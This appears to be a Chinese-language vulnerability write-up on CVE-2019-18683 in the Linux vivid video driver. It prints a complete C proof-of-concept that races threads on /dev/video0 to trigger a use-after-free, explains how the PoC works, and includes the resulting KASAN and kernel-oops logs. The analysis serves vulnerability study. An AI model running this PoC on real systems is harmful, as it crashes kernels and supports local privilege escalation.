
cve-2019-18683

0x00 环境搭建

0x01 poc分析

/*
* PoC crashing the kernel using the bug in drivers/media/platform/vivid.
* Turned out that this bug is exploitable.
* Just for fun.
*/

#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/mman.h>

/* Report the failing call through perror() and terminate the whole process. */
#define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0)

/* Number of racer threads started by main(); thread n is pinned to CPU n % 2. */
#define THREADS_N 2
/* open()/read()/close() iterations performed by each racer thread. */
#define LOOP_N 10000

/* Destination buffer for read(); mapped once in main() and shared by all racer threads. */
unsigned char *buf = NULL;

/*
 * Thread body for one racer.  arg is the thread number that main() passed
 * as (void *)i; it selects the CPU the thread is pinned to (n % 2) and the
 * microsecond sleep at the end of every iteration.  The loop opens
 * /dev/video0, issues a single read() into the global buffer and closes
 * the descriptor again, LOOP_N times.  Returns NULL after the last
 * iteration; a failing sched_setaffinity() or open() ends the whole
 * process through err_exit() instead.
 */
void *racer(void *arg)
{
	unsigned long n = (unsigned long)arg;
	unsigned long cpu_n = n % 2;	/* thread 0 -> CPU 0, thread 1 -> CPU 1 */
	cpu_set_t single_cpu;
	int ret = 0;
	unsigned long loop = 0;

	/* Pin the calling thread (pid argument 0) to exactly one CPU. */
	CPU_ZERO(&single_cpu);
	CPU_SET(cpu_n, &single_cpu);
	ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);
	if (ret != 0)
		err_exit("[-] sched_setaffinity for a single CPU");

	printf("[+] racer #%lu is on the start on CPU %lu\n", n, cpu_n);

	for (loop = 0; loop < LOOP_N; loop++) {
		int fd = 0;

		/* printf(" racer %lu, loop %lu\n", n, loop); */

		fd = open("/dev/video0", O_RDWR);
		if (fd < 0)
			err_exit("[-] open /dev/video0");

		/*
		 * 0xfffded bytes fits inside the 0x1000000-byte mapping made in
		 * main().  The return value is not checked and the data is never
		 * looked at; only the read() call itself matters here.
		 */
		read(fd, buf, 0xfffded);
		close(fd);

		/*
		 * n is 0 or 1 here, so this sleeps 0 or 1 microsecond -
		 * presumably to vary the interleaving of the two threads.
		 */
		usleep(n);
	}

	return NULL;
}

/*
 * Entry point.  Prints the preconditions the PoC expects, verifies that the
 * process may run on at least two CPUs, maps the shared read buffer, starts
 * THREADS_N racer threads and joins them.  If every racer returns normally
 * the race did not trigger, so the process exits with EXIT_FAILURE; this
 * function never returns 0.
 */
int main(void)
{
	int ret = -1;
	cpu_set_t all_cpus;
	pthread_t th[THREADS_N] = { 0 };
	long i = 0;

	printf("[!] gonna work with /dev/video0\n");
	printf("[!] please check that:\n");
	printf("\t vivid driver is loaded\n");
	printf("\t /dev/video0 is the V4L2 capture device\n");
	printf("\t you are logged in (Ubuntu adds RW ACL for /dev/video0)\n");

	/* CPU mask of the current process; CPU_COUNT() below needs at least two. */
	ret = sched_getaffinity(0, sizeof(all_cpus), &all_cpus);
	if (ret != 0)
		err_exit("[-] sched_getaffinity");

	if (CPU_COUNT(&all_cpus) < 2) {
		printf("[-] not enough CPUs for racing\n");
		exit(EXIT_FAILURE);
	}

	printf("[+] we have %d CPUs for racing\n", CPU_COUNT(&all_cpus));
	fflush(NULL);	/* flush every stdio stream before the threads start printing */

	/*
	 * 16 MiB (0x1000000) anonymous mapping used as the read() destination
	 * by every racer.  It is never munmap()ed: the process exits right
	 * after the join below.
	 */
	buf = mmap(NULL, 0x1000000, PROT_READ | PROT_WRITE,
		   MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	if (buf == MAP_FAILED)
		err_exit("[-] mmap");
	else
		printf("[+] buf for reading is mmaped at %p\n", buf);

	/* The thread number travels by value inside the pointer argument. */
	for (i = 0; i < THREADS_N; i++) {
		ret = pthread_create(&th[i], NULL, racer, (void *)i);
		if (ret != 0)
			err_exit("[-] pthread_create for racer");
	}

	for (i = 0; i < THREADS_N; i++) {
		ret = pthread_join(th[i], NULL);
		if (ret != 0)
			err_exit("[-] pthread_join");
	}

	/* Reaching this point means all LOOP_N iterations finished without a crash. */
	printf("[-] racing is failed, try it again\n");

	exit(EXIT_FAILURE);
}

我们可以看到poc首先调用了sched_getaffinity() 函数,参考:

我们可以知道 sched_setaffinity() 是用来把某一个进程(或线程)绑定到特定的cpu上运行, 而 sched_getaffinity() 是用来获取某一进程可以在哪些cpu上运行;两者的返回值都是 0 为成功,-1 为失败。利用这两个函数把线程固定到不同的cpu上,也更有利于用gdb调试条件竞争类的漏洞。

之后调用CPU_COUNT()函数来获得当前进程可以运行的cpu的数量,少于 2 个就直接退出,因为这个条件竞争至少需要两个cpu并行跑。

之后调用 pthread_create() 函数来创建 THREADS_N 个线程,去运行racer函数。比较有意思的是,你创建的这个线程和当前进程共享同一个地址空间,所以 racer 可以直接用到 buf 这样的全局变量;而线程编号 i 则是以 (void *)i 的形式按值传进去的。。。

然后就是racer()函数。它只用两个cpu:CPU_ZERO()清空cpu集合,CPU_SET()把给定的cpu号加入集合,再用sched_setaffinity()把当前线程绑定到那个cpu上;之后在for循环里反复open()、read()、close(),每轮结束再用usleep()挂起一小段时间。

0x02 漏洞分析

0x00 file_operations

/*
 * file_operations table for V4L2 device nodes such as /dev/video0.  The
 * open()/read()/close() calls issued by the PoC are dispatched to
 * v4l2_open, v4l2_read and v4l2_release (the latter runs on the final
 * close of the file, see __fput -> v4l2_release in the trace below).
 * .llseek is no_llseek, so lseek() on the device always fails with -ESPIPE.
 */
static const struct file_operations v4l2_fops = {
	.owner = THIS_MODULE,
	.read = v4l2_read,		/* read(2) */
	.write = v4l2_write,		/* write(2) */
	.open = v4l2_open,		/* open(2) */
	.get_unmapped_area = v4l2_get_unmapped_area,
	.mmap = v4l2_mmap,		/* mmap(2) */
	.unlocked_ioctl = v4l2_ioctl,	/* ioctl(2) */
#ifdef CONFIG_COMPAT
	.compat_ioctl = v4l2_compat_ioctl32,	/* 32-bit ioctl(2) on a 64-bit kernel */
#endif
	.release = v4l2_release,	/* last close(2) of the file */
	.poll = v4l2_poll,		/* poll(2)/select(2) */
	.llseek = no_llseek,		/* seeking is not supported */
};

然后发现

1
2
3
4
/*
 * llseek handler for non-seekable files: every seek attempt is rejected
 * with -ESPIPE, whatever offset and whence were requested.
 */
loff_t no_llseek(struct file *file, loff_t offset, int whence)
{
	(void)file;
	(void)offset;
	(void)whence;

	return -ESPIPE;
}

0x03 运行poc

[   51.334790] ------------[ cut here ]------------
[ 51.335853] WARNING: CPU: 1 PID: 298 at drivers/media/common/videobuf2/videobuf2-core.c:1882 __vb2_queue_cancel.cold+0x11/0x212
[ 51.337830] Modules linked in:
[ 51.338383] CPU: 1 PID: 298 Comm: poc Not tainted 5.3.8 #3
[ 51.339360] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
[ 51.341072] RIP: 0010:__vb2_queue_cancel.cold+0x11/0x212
[ 51.342023] Code: 50 a1 fe e9 6d ff ff ff e8 90 50 a1 fe e9 fc fe ff ff e8 86 50 a1 fe eb b5 e8 bf 7a 79 fe 48 c7 c7 20 46 20 84 e8 cc 11 64 fe <0f> 0b 8
[ 51.345211] RSP: 0018:ffff888064807cb8 EFLAGS: 00010282
[ 51.346130] RAX: 0000000000000024 RBX: 0000000000000001 RCX: 0000000000000000
[ 51.347365] RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffffed100c900f89
[ 51.348611] RBP: ffff8880699963c4 R08: 0000000000000024 R09: ffffed100da25de0
[ 51.349843] R10: ffffed100da25ddf R11: ffff88806d12eeff R12: ffff888069996458
[ 51.351081] R13: ffff888069996460 R14: ffff888069996180 R15: ffff88806a254500
[ 51.352327] FS: 00007ff7ba809700(0000) GS:ffff88806d100000(0000) knlGS:0000000000000000
[ 51.353717] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 51.354714] CR2: 00007ff7ba808e78 CR3: 0000000069d96000 CR4: 00000000000006e0
[ 51.355949] Call Trace:
[ 51.356403] vb2_core_streamoff+0x59/0x140
[ 51.357150] __vb2_cleanup_fileio+0x70/0x160
[ 51.357905] vb2_core_queue_release+0x1a/0x70
[ 51.358679] _vb2_fop_release+0x1c1/0x280
[ 51.359397] vivid_fop_release+0x18b/0x430
[ 51.360131] ? vivid_dev_release+0x1b0/0x1b0
[ 51.360887] ? dev_debug_store+0x100/0x100
[ 51.361613] v4l2_release+0x2cc/0x370
[ 51.362278] ? dev_debug_store+0x100/0x100
[ 51.363009] __fput+0x2da/0x850
[ 51.363587] task_work_run+0x144/0x1c0
[ 51.364270] exit_to_usermode_loop+0x1d2/0x200
[ 51.365058] do_syscall_64+0x465/0x580
[ 51.365746] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 51.366634] RIP: 0033:0x404ff1
[ 51.367187] Code: 75 14 b8 03 00 00 00 0f 05 48 3d 01 f0 ff ff 0f 83 34 5e 00 00 c3 48 83 ec 08 e8 6a fc ff ff 48 89 04 24 b8 03 00 00 00 0f 05 <48> 8b 1
[ 51.370438] RSP: 002b:00007ff7ba808d00 EFLAGS: 00000293 ORIG_RAX: 0000000000000003
[ 51.371782] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000404ff1
[ 51.373034] RDX: fffffffffffffff0 RSI: 00007ff7bb00b000 RDI: 0000000000000004
[ 51.374265] RBP: 00007ff7ba808dd0 R08: 0000000000000001 R09: 0000000000000026
[ 51.375473] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffd63d69cce
[ 51.376654] R13: 00007ffd63d69ccf R14: 00007ff7ba009000 R15: 0000000000000003
[ 51.377824] irq event stamp: 144
[ 51.378369] hardirqs last enabled at (143): [<ffffffff812892c8>] console_unlock+0x8f8/0xc40
[ 51.379723] hardirqs last disabled at (144): [<ffffffff8100430a>] trace_hardirqs_off_thunk+0x1a/0x20
[ 51.381148] softirqs last enabled at (140): [<ffffffff83c0065f>] __do_softirq+0x65f/0x924
[ 51.382441] softirqs last disabled at (133): [<ffffffff81159038>] irq_exit+0x178/0x1a0
[ 51.383683] ---[ end trace 9ff69050999e0cbd ]---
[ 51.384474] videobuf2_common: driver bug: stop_streaming operation is leaving buf 0000000026272a93 in active state
[ 51.387999] ==================================================================
[ 51.389187] BUG: KASAN: use-after-free in vid_cap_buf_queue+0x191/0x1c0
[ 51.390158] Write of size 8 at addr ffff88806a0b1a20 by task poc/298
[ 51.391125]
[ 51.391365] CPU: 1 PID: 298 Comm: poc Tainted: G W 5.3.8 #3
[ 51.392373] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
[ 51.393745] Call Trace:
[ 51.394115] dump_stack+0xca/0x13e
[ 51.394614] print_address_description+0x62/0x31e
[ 51.395288] ? vid_cap_buf_queue+0x191/0x1c0
[ 51.395902] ? vid_cap_buf_queue+0x191/0x1c0
[ 51.396512] __kasan_report.cold+0x1a/0x40
[ 51.397099] ? vid_cap_buf_queue+0x191/0x1c0
[ 51.397711] kasan_report+0xe/0x12
[ 51.398192] vid_cap_buf_queue+0x191/0x1c0
[ 51.398789] ? vid_cap_buf_request_complete+0xa0/0xa0
[ 51.399492] __enqueue_in_driver+0x13f/0x390
[ 51.400081] vb2_start_streaming+0x62/0x2d0
[ 51.400658] vb2_core_streamon+0x1c5/0x2b0
[ 51.401225] __vb2_init_fileio+0x97d/0xba0
[ 51.401790] __vb2_perform_fileio+0xbab/0x10c0
[ 51.402421] ? fsnotify+0x786/0xb20
[ 51.402912] ? __fsnotify_parent+0xd1/0x370
[ 51.403493] ? vb2_thread_start+0x360/0x360
[ 51.404082] ? fsnotify_first_mark+0x200/0x200
[ 51.404704] vb2_fop_read+0x20e/0x400
[ 51.405220] v4l2_read+0x1f4/0x270
[ 51.405727] ? v4l2_write+0x270/0x270
[ 51.406234] __vfs_read+0x7c/0x100
[ 51.406712] vfs_read+0x1ef/0x430
[ 51.407202] ksys_read+0x127/0x250
[ 51.407673] ? kernel_write+0x120/0x120
[ 51.408221] ? __ia32_sys_nanosleep_time32+0x220/0x220
[ 51.408976] ? trace_hardirqs_off_caller+0x55/0x1e0
[ 51.409701] do_syscall_64+0xbd/0x580
[ 51.410290] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 51.411076] RIP: 0033:0x404f91
[ 51.411562] Code: 75 14 b8 00 00 00 00 0f 05 48 3d 01 f0 ff ff 0f 83 94 5e 00 00 c3 48 83 ec 08 e8 ca fc ff ff 48 89 04 24 b8 00 00 00 00 0f 05 <48> 8b 1
[ 51.414332] RSP: 002b:00007ff7ba808d00 EFLAGS: 00000293 ORIG_RAX: 0000000000000000
[ 51.415492] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 0000000000404f91
[ 51.416578] RDX: 0000000000fffded RSI: 00007ff7bb00b000 RDI: 0000000000000003
[ 51.417686] RBP: 00007ff7ba808dd0 R08: 0000000000000001 R09: 0000000000000026
[ 51.418823] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffd63d69cce
[ 51.419919] R13: 00007ffd63d69ccf R14: 00007ff7ba009000 R15: 0000000000000003
[ 51.421030]
[ 51.421287] Allocated by task 297:
[ 51.421851] save_stack+0x1b/0x80
[ 51.422390] __kasan_kmalloc.constprop.0+0xc2/0xd0
[ 51.423155] __vb2_queue_alloc+0xe8/0xf20
[ 51.423816] vb2_core_reqbufs+0x495/0xcf0
[ 51.424455] __vb2_init_fileio+0x33b/0xba0
[ 51.425102] __vb2_perform_fileio+0xbab/0x10c0
[ 51.425812] vb2_fop_read+0x20e/0x400
[ 51.426394] v4l2_read+0x1f4/0x270
[ 51.426934] __vfs_read+0x7c/0x100
[ 51.427481] vfs_read+0x1ef/0x430
[ 51.428016] ksys_read+0x127/0x250
[ 51.428566] do_syscall_64+0xbd/0x580
[ 51.429150] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 51.429930]
[ 51.430183] Freed by task 298:
[ 51.430674] save_stack+0x1b/0x80
[ 51.431191] __kasan_slab_free+0x12c/0x170
[ 51.431826] kfree+0xd2/0x2d0
[ 51.432308] __vb2_queue_free+0x501/0x870
[ 51.432941] vb2_core_reqbufs+0x212/0xcf0
[ 51.433571] __vb2_cleanup_fileio+0xed/0x160
[ 51.434241] vb2_core_queue_release+0x1a/0x70
[ 51.434920] _vb2_fop_release+0x1c1/0x280
[ 51.435579] vivid_fop_release+0x18b/0x430
[ 51.436223] v4l2_release+0x2cc/0x370
[ 51.436804] __fput+0x2da/0x850
[ 51.437306] task_work_run+0x144/0x1c0
[ 51.437897] exit_to_usermode_loop+0x1d2/0x200
[ 51.438609] do_syscall_64+0x465/0x580
[ 51.439206] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 51.439991]
[ 51.440273] The buggy address belongs to the object at ffff88806a0b1680
[ 51.440273] which belongs to the cache kmalloc-1k of size 1024
[ 51.442207] The buggy address is located 928 bytes inside of
[ 51.442207] 1024-byte region [ffff88806a0b1680, ffff88806a0b1a80)
[ 51.443943] The buggy address belongs to the page:
[ 51.444675] page:ffffea0001a82c00 refcount:1 mapcount:0 mapping:ffff88806c802280 index:0x0 compound_mapcount: 0
[ 51.446186] flags: 0x100000000010200(slab|head)
[ 51.446870] raw: 0100000000010200 ffffea0001a75c00 0000000400000004 ffff88806c802280
[ 51.448026] raw: 0000000000000000 00000000800e000e 00000001ffffffff 0000000000000000
[ 51.449192] page dumped because: kasan: bad access detected
[ 51.450017]
[ 51.450262] Memory state around the buggy address:
[ 51.450990] ffff88806a0b1900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 51.452085] ffff88806a0b1980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 51.453169] >ffff88806a0b1a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 51.454254] ^
[ 51.454907] ffff88806a0b1a80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 51.456007] ffff88806a0b1b00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 51.457111] ==================================================================
[ 51.458188] Disabling lock debugging due to kernel taint
[ 51.461635] BUG: kernel NULL pointer dereference, address: 0000000000000000
[ 51.462904] #PF: supervisor write access in kernel mode
[ 51.463887] #PF: error_code(0x0002) - not-present page
[ 51.464855] PGD 6a2d6067 P4D 6a2d6067 PUD 67a9f067 PMD 0
[ 51.465775] Oops: 0002 [#1] SMP KASAN NOPTI
[ 51.466412] CPU: 1 PID: 300 Comm: vivid-000-vid-c Tainted: G B W 5.3.8 #3
[ 51.467598] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
[ 51.469075] RIP: 0010:memcpy_orig+0x29/0x110
[ 51.469734] Code: 00 48 89 f8 48 83 fa 20 72 7e 40 38 fe 7c 35 48 83 ea 20 48 83 ea 20 4c 8b 06 4c 8b 4e 08 4c 8b 56 10 4c 8b 5e 18 48 8d 76 20 <4c> 89 3
[ 51.472507] RSP: 0018:ffff888063d97930 EFLAGS: 00010206
[ 51.473327] RAX: 0000000000000000 RBX: dffffc0000000000 RCX: ffffffff82c3a4ac
[ 51.474474] RDX: 00000000000004c0 RSI: ffffc90000061020 RDI: 0000000000000000
[ 51.475585] RBP: ffffc90000061000 R08: 80b380b380b380b3 R09: 80b380b380b380b3
[ 51.476641] R10: 80b380b380b380b3 R11: 80b380b380b380b3 R12: ffffc90000061000
[ 51.477689] R13: 0000000000000500 R14: ffff888069995aa0 R15: ffffc90000061000
[ 51.478774] FS: 0000000000000000(0000) GS:ffff88806d100000(0000) knlGS:0000000000000000
[ 51.479959] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 51.480816] CR2: 0000000000000000 CR3: 0000000069d96000 CR4: 00000000000006e0
[ 51.481870] Call Trace:
[ 51.482264] tpg_fill_plane_buffer+0x1afc/0x2f90
[ 51.482963] vivid_fillbuff+0x1886/0x3d10
[ 51.483577] ? finish_task_switch+0x126/0x5f0
[ 51.484243] ? vivid_grab_controls+0x380/0x380
[ 51.484914] ? __mutex_lock+0x535/0x1300
[ 51.485509] ? lock_downgrade+0x720/0x720
[ 51.486108] ? lockdep_hardirqs_on+0x580/0x580
[ 51.486777] ? vivid_thread_vid_cap_tick+0xb9c/0x1f40
[ 51.487541] ? lock_downgrade+0x720/0x720
[ 51.488154] ? do_raw_spin_lock+0x11b/0x280
[ 51.488793] ? rwlock_bug.part.0+0x90/0x90
[ 51.489410] ? vivid_thread_vid_cap_tick+0x735/0x1f40
[ 51.490172] vivid_thread_vid_cap_tick+0x735/0x1f40
[ 51.490925] ? kvm_clock_get_cycles+0x14/0x20
[ 51.491580] vivid_thread_vid_cap+0x2f2/0x970
[ 51.492246] ? vivid_thread_vid_cap_tick+0x1f40/0x1f40
[ 51.493018] kthread+0x31b/0x420
[ 51.493512] ? kthread_create_on_node+0xf0/0xf0
[ 51.494191] ? kthread_create_on_node+0xf0/0xf0
[ 51.494866] ret_from_fork+0x27/0x50
[ 51.495411] Modules linked in:
[ 51.495879] CR2: 0000000000000000
[ 51.496387] ---[ end trace 9ff69050999e0cbe ]---
[ 51.497108] RIP: 0010:memcpy_orig+0x29/0x110
[ 51.497788] Code: 00 48 89 f8 48 83 fa 20 72 7e 40 38 fe 7c 35 48 83 ea 20 48 83 ea 20 4c 8b 06 4c 8b 4e 08 4c 8b 56 10 4c 8b 5e 18 48 8d 76 20 <4c> 89 3
[ 51.500647] RSP: 0018:ffff888063d97930 EFLAGS: 00010206
[ 51.501465] RAX: 0000000000000000 RBX: dffffc0000000000 RCX: ffffffff82c3a4ac
[ 51.502583] RDX: 00000000000004c0 RSI: ffffc90000061020 RDI: 0000000000000000
[ 51.503699] RBP: ffffc90000061000 R08: 80b380b380b380b3 R09: 80b380b380b380b3
[ 51.504801] R10: 80b380b380b380b3 R11: 80b380b380b380b3 R12: ffffc90000061000
[ 51.505922] R13: 0000000000000500 R14: ffff888069995aa0 R15: ffffc90000061000
[ 51.507044] FS: 0000000000000000(0000) GS:ffff88806d100000(0000) knlGS:0000000000000000
[ 51.508290] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 51.509187] CR2: 0000000000000000 CR3: 0000000069d96000 CR4: 00000000000006e0
[ 51.510296] BUG: sleeping function called from invalid context at include/linux/percpu-rwsem.h:38
[ 51.511667] in_atomic(): 0, irqs_disabled(): 1, pid: 300, name: vivid-000-vid-c
[ 51.512797] INFO: lockdep is turned off.
[ 51.513416] irq event stamp: 0
[ 51.513919] hardirqs last enabled at (0): [<0000000000000000>] 0x0
[ 51.514908] hardirqs last disabled at (0): [<ffffffff81137860>] copy_process+0x1550/0x6940
[ 51.516201] softirqs last enabled at (0): [<ffffffff81137901>] copy_process+0x15f1/0x6940
[ 51.517474] softirqs last disabled at (0): [<0000000000000000>] 0x0
[ 51.518447] CPU: 1 PID: 300 Comm: vivid-000-vid-c Tainted: G B D W 5.3.8 #3
[ 51.519688] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20191223_100556-anatol 04/01/2014
[ 51.521181] Call Trace:
[ 51.521584] dump_stack+0xca/0x13e
[ 51.522132] ___might_sleep.cold+0x10f/0x129
[ 51.522812] exit_signals+0x75/0x920
[ 51.523387] ? do_signal_stop+0x840/0x840
[ 51.524049] do_exit+0x28b/0x2b30
[ 51.524582] ? vivid_thread_vid_cap+0x2f2/0x970
[ 51.525299] ? mm_update_next_owner+0x630/0x630
[ 51.526029] ? vivid_thread_vid_cap_tick+0x1f40/0x1f40
[ 51.526843] ? kthread+0x31b/0x420
[ 51.527388] rewind_stack_do_exit+0x17/0x20